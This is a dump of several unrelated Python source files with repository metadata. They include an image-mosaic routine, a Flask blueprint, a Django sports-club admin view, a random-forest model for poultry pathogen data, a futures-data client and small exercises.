for i in range(0, bigger_image.shape[0] - H, H):
col_index = 0
for j in range(2 * width_divided_by_3, bigger_image.shape[1] - W, W + width_divided_by_3):
patch = bigger_image[i: i + H, j: j + W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)
for ii in index:
if row_index > 1 and col_index > 1:
if small_images_indexes[row_index - 2, col_index - 2] == ii:
continue
if col_index > 1:
if small_images_indexes[row_index, col_index - 2] == ii:
continue
if row_index > 1:
if small_images_indexes[row_index - 2, col_index] == ii:
continue
break
index = ii
img_mosaic[i: i + H, j: j + W] = (1 - mask) * img_mosaic[i: i + H, j: j + W] + mask * params.small_images[index]
small_images_indexes[row_index, col_index] = index
col_index += 2
row_index += 2
img_mosaic = img_mosaic[H: H + h, W: W + w, ]
end_time = timeit.default_timer()
print('Running time: %f s.' % (end_time - start_time))
return img_mosaic
|
[
"predacatalin99@gmail.com"
] |
predacatalin99@gmail.com
|
753fcfdcb661bc572d8a1c5e7ede1d3024ca7494
|
91bd632a44a636953d569ed14229523c0551abb7
|
/zad14_2.py
|
5238cdb787ca77f5a029f91041fb2a54b1716c8b
|
[
"MIT"
] |
permissive
|
kamilhabrych/python-semestr5-lista14
|
c58206b6bad8454b5c928a66dd95388524ba5184
|
b5dea544d98a1badbd6fee9e6220196a5f9dd7c0
|
refs/heads/main
| 2023-03-12T11:15:01.032592
| 2021-03-08T14:43:50
| 2021-03-08T14:43:50
| 344,571,785
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 774
|
py
|
from graphics import *
max_width = 500
max_height = 500
win = GraphWin('Kamil Habrych zadanie 2', max_width, max_height)
win.setBackground('white')
circle = Circle(Point(250,250),50)
circle.setFill('brown')
circle.draw(win)
lengthOfMove = 20
while True:
pt_circle = circle.getCenter()
r_circle = circle.getRadius()
key = win.getKey()
if key == 'w' and pt_circle.y - r_circle > 0:
circle.move(0,-lengthOfMove)
elif key == 's' and pt_circle.y + r_circle < max_height:
circle.move(0,lengthOfMove)
elif key == 'a' and pt_circle.x - r_circle > 0:
circle.move(-lengthOfMove,0)
elif key == 'd' and pt_circle.x + r_circle < max_width:
circle.move(lengthOfMove,0)
elif key == 'q':
break
win.close()
|
[
"noreply@github.com"
] |
kamilhabrych.noreply@github.com
|
24317dd98c1779c905c0a9984bad14e30e1b61d2
|
82b018b01a20685e080ee4cb6de3e8bfe816df23
|
/Chapter 5/campy_rf_feces.py
|
29a76d2c4972c41821bb5b84317ac240fcf5ded6
|
[] |
no_license
|
cgolden1993/Dissertation
|
ce0008c43d789547d557276984fdd7e992045eaf
|
96790cff770cf64010b61921277117c7c2e081ac
|
refs/heads/master
| 2020-12-29T23:47:51.496704
| 2020-03-02T16:36:44
| 2020-03-02T16:36:44
| 238,782,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,016
|
py
|
import pandas as pd
import numpy as np
from collections import Counter
from pprint import pprint
#import time
import matplotlib.pyplot as plt
#plt.style.use('ggplot') #changes plot styles to ggplot
from scipy.stats import randint as sp_randint
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import RandomizedSearchCV
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve, roc_auc_score
import joblib
import sys
sys.path.append('/Users/cegolden/Projects/Weather/Model_Development/')
#to determine run time of script
#start = time.time()
#define function that loads data via LoadData function
def LoadData():
global X_train, X_test, y_train, y_test, feces
global feature_columns, n_features, response_column
full = pd.read_excel("/Users/cegolden/Projects/Weather/Model_Development/Copy_of_Meteorological_poultry_data.xlsx", sheet_name = "Campylobacter")
#delete indicator variables
full = full.drop(full.columns[[0, 1, 2, 4, 5, 7]], axis=1)
#split data into soil and feces
feces = full[full.SampleType == 'Feces']
#drop sample type for each data set
feces = feces.drop(feces.columns[0], axis=1)
#get column names and store them
feature_columns = list(feces.columns)
feature_columns.remove('CampyCef')
response_column = ['CampyCef']
#get number of features
n_features = len(feature_columns)
#split up into x and y where y is response variable
#.values turns df into array
X_feces = feces.drop('CampyCef', axis=1).values
y_feces = feces['CampyCef']
#convert + into 1 and - into 0 and make this column an array
y_feces = y_feces.map({'+': 1, '-': 0}).values
#split into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X_feces, y_feces, test_size = 0.2, random_state = 151, stratify = y_feces)
print('Original dataset shape %s' % Counter(y_train))
return
def ModelFit():
global best_model
#contruct hyperparameter grid
param_dist = {"max_depth": [3, 10, 20, 70, None],
"max_features": [2, 10, 41, 80, 'sqrt'],
"min_samples_split": sp_randint(2, 11),
"min_samples_leaf": sp_randint(1, 11),
#"bootstrap": [True, False],
"criterion": ["gini", "entropy"],
"n_estimators": [100, 300, 500, 800, 1000]}
pprint(param_dist)
#define random forest classifier function
rf = RandomForestClassifier(random_state = 120)
#search across 1000 randomized combinations in the above grid
estimator = RandomizedSearchCV(estimator = rf, param_distributions = param_dist, n_iter = 1000, cv = 10, verbose = 10, random_state = 12, scoring = 'roc_auc', n_jobs = -1)
#fit the model
grid_result = estimator.fit(X_train, y_train)
#find and define best estimator based on grid search
best_model = grid_result.best_estimator_
print('\nbest_model:\n', best_model)
#predict y based on test data
y_pred = grid_result.predict(X_test)
#accuracy score
print('accuracy score:', accuracy_score(y_test, y_pred))
#confusion matrix
tn, fp, fn, tp = confusion_matrix(y_test, y_pred).ravel()
print(tn,fp,fn,tp)
#classification report
print('\nclassification report:\n',classification_report(y_test, y_pred))
#AUC and ROC curve
y_pred_prob = grid_result.predict_proba(X_test)[:,1]
auc = roc_auc_score(y_test, y_pred_prob)
print('auc:', auc)
false_positive, true_positive, _ = roc_curve(y_test, y_pred_prob)
font = {'fontname':'Helvetica'}
plt.figure()
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(false_positive, true_positive, color='black')
plt.xlabel('False positive rate', **font)
plt.ylabel('True positive rate', **font)
plt.savefig('feces_roc.png', dpi=300)
plt.show()
# Save the model as a pickle in a file
joblib.dump(grid_result, 'campy_rf_feces.pkl')
#determine best features
feature_importances = grid_result.best_estimator_.feature_importances_
column_names=list(feces)
del column_names[-0]
importance = pd.DataFrame(feature_importances, index=column_names, columns=["Importance"])
sort_importance = importance.sort_values(by=['Importance'], ascending = False)
sort_column_names = sort_importance.index.values.tolist()
mult = 100/(sort_importance['Importance'].iloc[0])
sort_imp_mult = sort_importance * mult
top_imp = sort_imp_mult['Importance'].iloc[0:15].tolist()
top_column_names = sort_column_names[0:15]
top_column_names = ['AvgMaxGustSpeed1.6',
'AvgAverageHumidity1.7',
'AverageHumidityTwoDayBefore',
'AvgMaxGustSpeed1.3',
'AvgMaxGustSpeed1.5',
'AvgMinTemperature1.7',
'AvgMaxWindSpeed1.7',
'AvgMinHumidity1.4',
'AvgMaxHumidity1.3',
'AvgPrecipitation1.4',
'MaxGustSpeedOneDayBefore',
'AvgMaxGustSpeedS1.2',
'AvgMaxWindSpeed1.4',
'AvgAverageHumidity1.3',
'MaxGustSpeedTwoDayBefore']
plt.rcParams.update(plt.rcParamsDefault)
y_ticks = np.arange(0, len(top_column_names))
fig, ax = plt.subplots()
ax.barh(y_ticks, top_imp, color = "dimgray")
ax.set_yticklabels(top_column_names, **font)
ax.set_yticks(y_ticks)
plt.xlabel('Relative Importance', **font)
fig.tight_layout()
plt.gca().invert_yaxis()
plt.savefig('feces_var.png', dpi=300)
plt.show()
return
LoadData()
ModelFit()
#to determine run time of script
#print('This program took {0:0.1f} seconds'.format(time.time() - start))
|
[
"cgolden1993@gmail.com"
] |
cgolden1993@gmail.com
|
c7062d7318e35df1a0692c6a4756df7f166434ae
|
fac7a965a035c713b83890b7384648c1d83a179a
|
/ML/cnn_config.py
|
4f1f620700687bdaf3c7ec600dbf9e10aa52e248
|
[
"Apache-2.0"
] |
permissive
|
shiyxg/tremor
|
160b170cf44c863a9c485662cfb04281f1b2919d
|
18c4efa8104fe2aba9789488aeca200b6fa143e5
|
refs/heads/master
| 2020-03-23T21:38:34.039712
| 2018-07-25T03:25:52
| 2018-07-25T03:25:52
| 142,121,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,446
|
py
|
# -*- coding:utf-8
class CNNConf:
def __init__(self):
self.INPUT_SHAPE = [32, 32, 1]
self.OUTPUT_SHAPE = [32, 32, 1]
self.conv = []
self.conv.append({
'name': 'convBlock1',
'times': 2,
'filterSize': [3, 3],
'outputChn': 64,
'strideSize': [1, 1],
'is_training': True
})
self.conv.append({
'name': 'convBlock2',
'times': 2,
'filterSize': [3, 3],
'outputChn': 128,
'strideSize': [1, 1],
'is_training': True
})
self.conv.append({
'name': 'convBlock3',
'times': 2,
'filterSize': [3, 3],
'outputChn': 256,
'strideSize': [1, 1],
'is_training': True
})
self.conv.append({
'name': 'convBlock4',
'times': 2,
'filterSize': [3, 3],
'outputChn': 512,
'strideSize': [1, 1],
'is_training': True
})
self.NN = []
self.NN.append({
'name': 'NN1',
'num': 4096
})
self.NN.append({
'name': 'NN2',
'num': 4096
})
self.NN.append({
'name': 'output',
'num': self.INPUT_SHAPE[0]*self.INPUT_SHAPE[1]
})
|
[
"shiyxg@163.com"
] |
shiyxg@163.com
|
403712191e3ca6c3157643b795608c3c3134eecb
|
81efa90f461bfcb2569a570626fe69b59f3b221a
|
/Core/views/administracion/inicio/views.py
|
8bdcbb7b0f890dc227ba71a4e8d35c495a677e43
|
[] |
no_license
|
gonvazsua/SportManagement
|
1760188f2ba54964a33805981eee191a14822baf
|
cdc0ed7a625ad1e2ea754074d2594d6a5b1a3b99
|
refs/heads/master
| 2021-04-09T16:10:29.550367
| 2016-11-27T10:51:52
| 2016-11-27T10:51:52
| 31,132,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,680
|
py
|
# -*- encoding: utf-8 -*-
from Core.utils import *
from django.db.models import *
from datetime import date,datetime
from django.conf import settings
from django.db.models import Q
import logging
from django.contrib.auth.decorators import login_required
from Core.utils import cargar_tipos_notificaciones_settings
#Instancia del log
logger = logging.getLogger(__name__)
ruta_pagina_principal = 'administracion/inicio/pagina_principal.html'
ruta_imprimir_planificacion = 'administracion/inicio/imprimir.html'
@login_required()
def perfil_administrador(request, id_usuario):
perfil = comprueba_usuario_administrador(id_usuario, request)
#Esto solo se hace en la pagina principal
#Cargamos datos en sesion, si fuera necesario
#Guardamos en sesion una lista de pares {nombre_club, club_id} en los que el jugador es administrador, nos quedamos con el primero para que sea el inicial en mostrarse:
if not "nombre_club_id" in request.session or not "club_id" in request.session:
clubes_administrador = Club.objects.filter(
id__in = PerfilRolClub.objects.values_list('club_id', flat=True).filter(perfil = perfil, rol_id = settings.ROL_ADMINISTRADOR)
).order_by('nombre')
es_primer_club = True
club_id = None
nombre_club_id = {}
for c in clubes_administrador:
if es_primer_club:
club_id = c.id
es_primer_club = False
nombre_club_id[c.nombre] = c.id
request.session["club_id"] = club_id
request.session["nombre_club_id"] = nombre_club_id
else:
club_id = request.session["club_id"]
club = Club.objects.get(id = club_id)
try:
rutaTiempo = ""#RutaTiempo.objects.get(municipio=club.municipio)
except Exception:
rutaTiempo = ""
num_jugadores = PerfilRolClub.objects.filter(club = club, perfil__user__is_active = True).count()
num_partidos_hoy = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(pista__club=club, fecha__startswith=date.today(), num_perfiles=4).count()
num_partidos_abiertos_hoy = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(
fecha__startswith=date.today(), num_perfiles__lt=4, num_perfiles__gt=0, pista__in=Pista.objects.filter(club=club)).count()
if request.method == "POST":
franja_horaria_id = request.POST.get('franja_horaria')
if franja_horaria_id:
franja_horaria_actual = FranjaHora.objects.get(id = franja_horaria_id)
else:
franja_horaria_actual = FranjaHora.objects.filter(club = club, inicio__lt=datetime.now().time(), fin__gt=datetime.now().time()).first()
else:
franja_horaria_actual = FranjaHora.objects.filter(club = club, inicio__lt=datetime.now().time(), fin__gt=datetime.now().time()).first()
#Sacamos franjas horarias para el listado
franjas_horarias = FranjaHora.objects.filter(club = club).order_by('inicio')
if franja_horaria_actual:
num_partidos_en_juego = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(
pista__in=Pista.objects.filter(club=club),
franja_horaria=franja_horaria_actual,
num_perfiles=4,
fecha=date.today()).count()
else:
num_partidos_en_juego = 0
franja_horaria_actual = FranjaHora.objects.filter(club = club).order_by('inicio').first()
#Partidos de la franja horaria
partidos_ahora = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(
pista__in = Pista.objects.filter(club=club), franja_horaria=franja_horaria_actual,
num_perfiles = 4
)
pistas = Pista.objects.filter(club = club).order_by("deporte", "orden", "nombre")
#Pistas y partidos de la franja horaria
pistas_partidos = {}
for p in pistas:
try:
partido = Partido.objects.get(pista = p, franja_horaria = franja_horaria_actual, fecha__startswith=date.today())
pistas_partidos[p] = partido
except Partido.DoesNotExist:
pistas_partidos[p] = ""
#Notificaciones
try:
campos_fijos_query = Q(estado = settings.ESTADO_NULL, leido = settings.ESTADO_NO)
notificaciones = Notificacion.objects.filter(
Q(
Q(tipo__in = (settings.TIPO_NOTIF_UNIRSE_A_PARTIDO, settings.TIPO_NOTIF_INSCRIPCION_CLUB)) &
(Q(club = club) | Q(partido__pista__club = club)) & campos_fijos_query
) |
Q(
Q(tipo = settings.TIPO_NOTIF_COMENTARIO_PARTIDO, jugador = perfil) & campos_fijos_query
)
).order_by("-fecha")[:5]
except Exception:
notificaciones = []
municipio_guiones = separa_guiones(club.municipio.municipio)
data = {'perfil':perfil, 'club':club, 'num_jugadores':num_jugadores, 'num_partidos_hoy':num_partidos_hoy,
'num_partidos_abiertos_hoy':num_partidos_abiertos_hoy,
'num_partidos_en_juego':num_partidos_en_juego, 'franja_horaria_actual':franja_horaria_actual,
'pistas_partidos':pistas_partidos, 'pistas':pistas,
'rutaTiempo':rutaTiempo, 'notificaciones':notificaciones,
'franjas_horarias':franjas_horarias, 'municipio_guiones':municipio_guiones
}
data = cargar_tipos_notificaciones_settings(data)
return render_to_response(ruta_pagina_principal, data, context_instance=RequestContext(request))
#Vista que intercambia el club que esta vigente en sesion
@login_required()
def cambio_club_administrador(request, id_usuario, club_id):
request.session["club_id"] = club_id
return HttpResponseRedirect("/administrador/"+id_usuario)
def separa_guiones(cadena):
res = ""
split_cadena = cadena.split(" ")
for index, s in enumerate(split_cadena):
res += s
if index != len(split_cadena)-1:
res += "-"
return res
def separa_comas(lista_perfiles):
res = ""
if len(lista_perfiles) > 0:
cont = 0
for user in lista_perfiles:
if cont != 0:
res = res + ", "
res = res + str(user)
cont = cont + 1
return res
#Imprimir planificacion diaria
@login_required()
def imprimir_planificacion(request, club_id):
mapa_franjas_pista = {}
mapa_pista_partido = {}
data = {}
try:
hoy = date.today()
pistas = Pista.objects.filter(club__id = club_id).order_by("orden")
franjas = FranjaHora.objects.filter(club__id = club_id).order_by("inicio")
for fh in franjas.all():
mapa_pista_partido = {}
for pista in pistas.all():
try:
#Se busca partido de esa pista y esa FH
partido = Partido.objects.filter(fecha = hoy, franja_horaria__id = fh.id, pista__id = pista.id)[:1].get()
perfiles = []
for perfil in partido.perfiles.all():
perfiles.append(perfil.user.username)
except Partido.DoesNotExist:
partido = None
perfiles = []
#Se actualiza el mapa de pista y partido
mapa_pista_partido[pista] = separa_comas(perfiles)
#Para cada franja horaria, se actualizan las pistas
mapa_franjas_pista[fh] = mapa_pista_partido
data["mapa_franjas_pistas"] = mapa_franjas_pista
except Exception, e:
error = "Ha habido un error al imprimir la planificación"
data["error"] = error
data["hoy"] = hoy
return render_to_response(ruta_imprimir_planificacion, data, context_instance=RequestContext(request))
|
[
"gonzalovazquezs@gmail.com"
] |
gonzalovazquezs@gmail.com
|
167a6dc35b93695c5bd036b9b48511a56c1c7163
|
0d0a4eeafb0273ee42367d0c936343d5b95b909d
|
/flask_blueprint_example/flaskScriptPrint/BluePrint2.py
|
d1d81e9536688ca81b20be9b71540da2026cd4ef
|
[] |
no_license
|
wenxuefeng3930/FlaskProject
|
4e52a394a034ce9f0b40684a04049a446bc94625
|
84569744adec76d9cfd8abc18fa51f0bad3e7bf5
|
refs/heads/master
| 2023-07-03T01:16:16.402369
| 2019-08-14T00:25:41
| 2019-08-14T00:25:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
py
|
"""
多蓝图命令行模式 蓝图2
"""
from flask import Blueprint
simple_blueprint2 = Blueprint("simple_page2",__name__) #创建蓝图
#bluePrint的路由和视图
@simple_blueprint2.route("/index2")
def index():
return "hello world2"
|
[
"laobian@qq.com"
] |
laobian@qq.com
|
7bae6397d5e871161b74b1423b0f7d92af2179e7
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_protectorates.py
|
dd027b0d6daa7f7d43e89f657ed8332912ed0cf6
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
from xai.brain.wordbase.nouns._protectorate import _PROTECTORATE
#calss header
class _PROTECTORATES(_PROTECTORATE, ):
def __init__(self,):
_PROTECTORATE.__init__(self)
self.name = "PROTECTORATES"
self.specie = 'nouns'
self.basic = "protectorate"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
7cb82e50a3b526596f89c5dc582ba08e64e4b9ac
|
7a9441513330da0c72b459e1293897b4845d0b28
|
/support_tools/bins.py
|
dbfc6a5a020685c6b059685a592e417370a53d62
|
[] |
no_license
|
ap190/LearnDeeply
|
64d1123bebf25478499131b15bce66bc1cdfeaa0
|
a673574bbcfc3e146eeae3eba362fc26de0cdb05
|
refs/heads/master
| 2020-04-07T10:25:53.490318
| 2019-12-24T06:11:56
| 2019-12-24T06:11:56
| 158,286,591
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,701
|
py
|
import json
import os
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np
"""
Class to create bins for likes, and for classifying likes to each bin with labels,
along with other support methods to visualize distribution.
"""
class bins:
def __init__(self, bin_nums = 10):
self.bin_nums = bin_nums
self.likes_array = self.count_elements()
self.sequence, self.bin_edges = self.numpy_histogram()
def count_elements(self):
"""
Count the elements, return counted, likes_array.
Input: Null
Output: counted[dictionary{num_likes: frequency}], likes_array[sequence]
"""
likes_array = []
with open("data.json", 'rb') as f:
loaded_json = json.load(f)
for user in loaded_json:
for post in user['images']:
num_likes = post['likes']
if type(num_likes) is str:
num_likes = int(num_likes.replace(",", ""))
if num_likes < 10870:
likes_array.append(num_likes)
print(len(likes_array))
counted = Counter(likes_array)
return likes_array
def get_LFR_for_user(self, user_data):
"""
Returns a list of LFR for a users posts.
"""
num_folowers = user_data["followers"]
if type(num_folowers) is str:
num_folowers = num_folowers.replace(",", "")
if "m" in num_folowers:
num_folowers = num_folowers.replace("m", "")
num_folowers = float(num_folowers) * 1000000
elif "k" in num_folowers:
num_folowers = num_folowers.replace("k", "")
num_folowers = float(num_folowers) * 1000
num_folowers = int(num_folowers)
posts = user_data["images"]
lfr_for_posts = []
for post in posts:
num_likes = post["likes"]
if type(num_likes) is str:
num_likes = num_likes.replace(",", "")
num_likes = int(num_likes)
lfr_for_posts.append(round(num_likes/num_folowers, 4))
return lfr_for_posts
def get_LFR_for_all_users(self):
"""
Gets
"""
with open("data.json") as file:
data = json.load(file)
lfr_for_all_posts = []
for user in data:
lfr_for_all_posts += self.get_LFR_for_user(user)
return lfr_for_all_posts
def ascii_histogram(self):
"""
Print frequency histogram in terminal.
Input: Null
Output: Null
"""
for k in sorted(self.counted):
print('{0:5d} {1}'.format(k, '+' * self.counted[k]))
def numpy_histogram(self):
"""
Input: bin_nums[number of bins]
Output: hist[y axies for histogram], bin_edges[x axies for histogram]
"""
hist, bin_edges = np.histogram(self.likes_array, bins = self.bin_nums)
# Show hist and bin_edges
print(hist)
print(bin_edges)
return hist, bin_edges
def visualize_histogram(self):
"""
Visualize the histogram.
Input: likes_array[sequence], bin_nums[number of bins].
Output: Null
"""
plt.hist(self.likes_array, bins = self.bin_nums)
plt.xlabel('Bins(number of likes)')
plt.ylabel('Posts')
plt.title('Histogram of %d Even Distributed Bins' % (self.bin_nums))
plt.show()
return
def even_bins(self):
"""
Create even bins based on sequence and number of bins.
Input: likes_array[sequence], bin_nums[number of bins]
Output: interval[number of posts in each bin], sequence[sequence of posts], bin_edges[x axies for histogram]
"""
likes_array = sorted(self.likes_array)
hist, bin_edges = [], []
interval = len(likes_array)//self.bin_nums
for i in range(len(likes_array)):
if i%interval == 0:
bin_edges.append(likes_array[i])
sequence = likes_array[:self.bin_nums*interval]
return interval, sequence, bin_edges
def bin_classification(self, likes):
for i in range(1, len(self.bin_edges)):
if (likes > self.bin_edges[i-1]) and (likes <= self.bin_edges[i]):
return i-1
return i-1
# BIN = bins(bin_nums = 100)
# BIN.visualize_histogram()
|
[
"qi_feng@brown.edu"
] |
qi_feng@brown.edu
|
19bc16da22037d022ce0059b019ffe42ab352117
|
d9788c9ad7ffcb089a89f436bdf06886b8995e24
|
/task30.py
|
3a85dbfecafd4f9795ed47035123346a378e805b
|
[] |
no_license
|
akyl-3008/p2t30
|
99a1d6edaf9f216223f5925e60123aa26f547c87
|
3613cce639fdaee1de28db9e1525cb2fbe3b35e3
|
refs/heads/master
| 2020-12-02T02:14:53.828850
| 2019-12-30T05:48:23
| 2019-12-30T05:48:23
| 230,855,659
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 70
|
py
|
wordy = ("privet", "privet", "kak", "ty")
print(wordy.count("privet"))
|
[
"akyl-3008@example.com"
] |
akyl-3008@example.com
|
b49f4867b92765140fea43924ef77775fdeaa1ca
|
b738f097345e3ef491fa18ae8fb4d0df52d28423
|
/done/python-tdd@polsl/test-sample.py
|
ed622673efa7d832e0e22a8297c527e4f676e656
|
[
"MIT"
] |
permissive
|
afronski/presentations
|
f2bc1ea4b36f097a1cd497c47fd920565859c7cc
|
86bc641c760bf532ae0db593ae4f4fe3545a7c86
|
refs/heads/master
| 2021-05-04T11:55:52.409420
| 2018-02-12T11:25:41
| 2018-02-12T11:25:41
| 5,912,257
| 2
| 2
| null | 2013-11-03T20:24:33
| 2012-09-22T10:41:22
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 542
|
py
|
import unittest
def hanoi(n):
return 2 ** n - 1
class TestGame(unittest.TestCase):
def setUp(self):
pass
def testBasicCase(self):
assert hanoi(3) == 7, "3 krążki hanoi da się przenieść w 7 ruchach"
def testLowerEdgeCase(self):
assert hanoi(0) == 0, "0 krążków = 0 ruchów"
def testTrivialCase(self):
assert hanoi(1) == 1, "1 krążek = 1 ruch"
def testAnotherCase(self):
assert hanoi(2) == 3, "2 krążki = 3 ruchy"
if __name__ == "__main__":
unittest.main()
|
[
"afronski@gmail.com"
] |
afronski@gmail.com
|
fb06ffd44f5a47e94e7f283d995aa7086e4026b8
|
324a2bdacb4b6c6286ce6886bca412cca283d649
|
/src/gym/test_parameters/analyze_comb.py
|
147145a8f48c1c03ffb5967f7de0245965229e70
|
[
"Apache-2.0"
] |
permissive
|
shaymargolis/PCC-RL
|
1c244640e68df4b811bb980147cb95e277bd3966
|
947a0016480db57a3bd1f96f3f892180d707496b
|
refs/heads/master
| 2023-02-10T03:01:13.496385
| 2020-12-04T15:25:45
| 2020-12-04T15:25:45
| 265,189,635
| 0
| 0
|
NOASSERTION
| 2020-05-19T08:27:52
| 2020-05-19T08:27:51
| null |
UTF-8
|
Python
| false
| false
| 2,470
|
py
|
import os
import numpy as np
import json
import pandas as pd
import tqdm
from src.gym.visualizer.single_sender_visualizer import SingleSenderVisualizer
INPUT_DIR = "/cs/labs/schapiram/shaymar/parameter_tests/comb_env"
data = []
class FakeEnv:
def reset(self, bool=False):
return None
def analyze_file(file):
vis = SingleSenderVisualizer(FakeEnv(), [], 0)
vis._load_data(file)
send = np.array(vis.data[0]["send"])
optim = np.array(vis.data[0]["optim"])
sig = np.array(vis.data[0]["significance"])[:, 0]
diffRate = optim - send
absDiffRate = np.abs(diffRate)
avgSig = np.mean(sig)
sigFinal = np.mean(sig[-500:])
return [
np.sum(diffRate) / vis.data[0]["times"][-1], # DiffRate
np.sum(absDiffRate) / vis.data[0]["times"][-1], # absDiffRate
avgSig, # avgSig
sigFinal, # sigFinal
file # filename
]
def analyze_dir_with_params(dir_path, dir_params):
for file_name in os.listdir(INPUT_DIR + "/" + dir_path):
if file_name.endswith(".json"):
res = []
try:
res = analyze_file(INPUT_DIR + "/" + dir_path + "/" + file_name)
except Exception as e:
# print(e)
print("\t[x] Error while analyzing %s" % (INPUT_DIR + "/" + dir_path + "/" + file_name))
continue
arr = dir_params[:]
arr += res
data.append(arr)
def analyze_dir(dir_path):
params = dir_path.split("-")
# $combLr-$combLowerLr-$combMinProba--$twopLr-$twopLowerLr-$twopDelta
dir_params = [
params[0], # combLr
params[1], # combLowerLr
params[2], # combMinProba
params[4], # twopLr
params[5], # twopLowerLr
params[6], # twopDelta
]
analyze_dir_with_params(dir_path, dir_params)
# for dir_name in tqdm.tqdm(os.listdir(INPUT_DIR)):
# analyze_dir(dir_name)
dir_params = [
3000, # combLr
0, # combLowerLr
0.1, # combMinProba
5000, # twopLr
0, # twopLowerLr
0.02, # twopDelta
]
FILE_NAME = "combined2_37_specific5"
analyze_dir_with_params(FILE_NAME, dir_params)
result = pd.DataFrame(data, columns=["combLr", "combLowerLr", "combMinProba", "twopLr", "twopLowerLr", "twopDelta",
"diffRate", "absDiffRate", "avgSig", "sigFinal", "file_name"])
result.to_csv("/cs/labs/schapiram/shaymar/comb-fixed-%s.csv" % FILE_NAME)
print(result)
|
[
"shay.margolis@mail.huji.ac.il"
] |
shay.margolis@mail.huji.ac.il
|
6164cedce8bab869c9e6734a74467c0777d4fa13
|
3d899feb92ce18a45e24426dc3b8650cd253818c
|
/vnpy/ppo/tqdata.py
|
1b0aeb1243639eab0fd6312294f55005728aa80d
|
[] |
no_license
|
qzl18/Quantitative-Trading-Demo
|
bbdd6756101d905da4dd1c1fda7e35f476aff7ec
|
20bbed0335fab4e49aa64d9702b948519a1bc277
|
refs/heads/master
| 2023-03-17T15:02:55.499729
| 2021-02-08T04:23:10
| 2021-02-08T04:23:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,394
|
py
|
import pandas as pd
from tqsdk import TqApi
from datetime import timedelta
from typing import List, Optional
from .setting import SETTINGS
from .constant import Exchange, Interval
from .object import BarData, HistoryRequest
# 时间戳对齐
TIME_GAP = 8 * 60 * 60 * 1000000000
INTERVAL_VT2TQ = {
Interval.MINUTE: 60,
Interval.HOUR: 60 * 60,
Interval.DAILY: 60 * 60 * 24,
}
class TianqinClient:
"""
Client for querying history data from Tianqin.
"""
def __init__(self):
""""""
self.inited: bool = False
self.symbols: set = set()
self.api = None
def init(self) -> bool:
""""""
if self.inited:
return True
try:
self.api = TqApi()
# 获得全部合约
self.symbols = [k for k, v in self.api._data["quotes"].items()]
except:
return False
self.inited = True
return True
def to_tq_symbol(self, symbol: str, exchange: Exchange) -> str:
"""
TQSdk exchange first
"""
for count, word in enumerate(symbol):
if word.isdigit():
break
# Check for index symbol
time_str = symbol[count:]
if time_str in ["88"]:
return f"KQ.m@{exchange}.{symbol[:count]}"
if time_str in ["99"]:
return f"KQ.i@{exchange}.{symbol[:count]}"
return f"{exchange.value}.{symbol}"
def query_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""
Query history bar data from TqSdk.
"""
symbol = req.symbol
exchange = req.exchange
interval = req.interval
start = req.start
end = req.end
tq_symbol = self.to_tq_symbol(symbol, exchange)
if tq_symbol not in self.symbols:
return None
tq_interval = INTERVAL_VT2TQ.get(interval)
if not tq_interval:
return None
# For querying night trading period data
end += timedelta(1)
# Only query open interest for futures contract
# 只能用来补充最新的数据,无法指定日期
df = self.api.get_kline_serial(tq_symbol, tq_interval, 8000).sort_values(by=["datetime"])
# 时间戳对齐
df["datetime"] = pd.to_datetime(df["datetime"] + TIME_GAP)
# 过滤开始结束时间
df = df[(df['datetime'] >= start - timedelta(days=1)) & (df['datetime'] < end)]
data: List[BarData] = []
if df is not None:
for ix, row in df.iterrows():
bar = BarData(
symbol=symbol,
exchange=exchange,
interval=interval,
datetime=row["datetime"].to_pydatetime(),
open_price=row["open"],
high_price=row["high"],
low_price=row["low"],
close_price=row["close"],
volume=row["volume"],
open_interest=row.get("open_oi", 0),
gateway_name="TQ",
)
data.append(bar)
return data
# 一次只能下载8000条数据,可以用于补充运行时的数据
tqdata_client = TianqinClient()
|
[
"xieyi@aksofy.cn"
] |
xieyi@aksofy.cn
|
726c876fb262f2048686ccf86e30f17fe5ee050b
|
3c5e61b9762ee1fcb26439fa722c1c0e2600b0db
|
/notebook/iternote/note.py
|
0c0b4724db35dc537cd7f858574d28923e820d44
|
[] |
no_license
|
jacksonyoudi/python-note
|
ccf5406faaf15a15abae5dbf5a993b91131d2dd5
|
098b4c4e8e713948ca96ef732c19f3b5efe60cbe
|
refs/heads/master
| 2021-01-17T15:13:12.573714
| 2016-10-25T03:09:24
| 2016-10-25T03:09:24
| 69,309,792
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,073
|
py
|
# coding: utf8
迭代器只不过是一个实现迭代协议的容器对象。它基于两个方法:
next 返回容器的下一个项目
__iter__ 返回迭代器本身
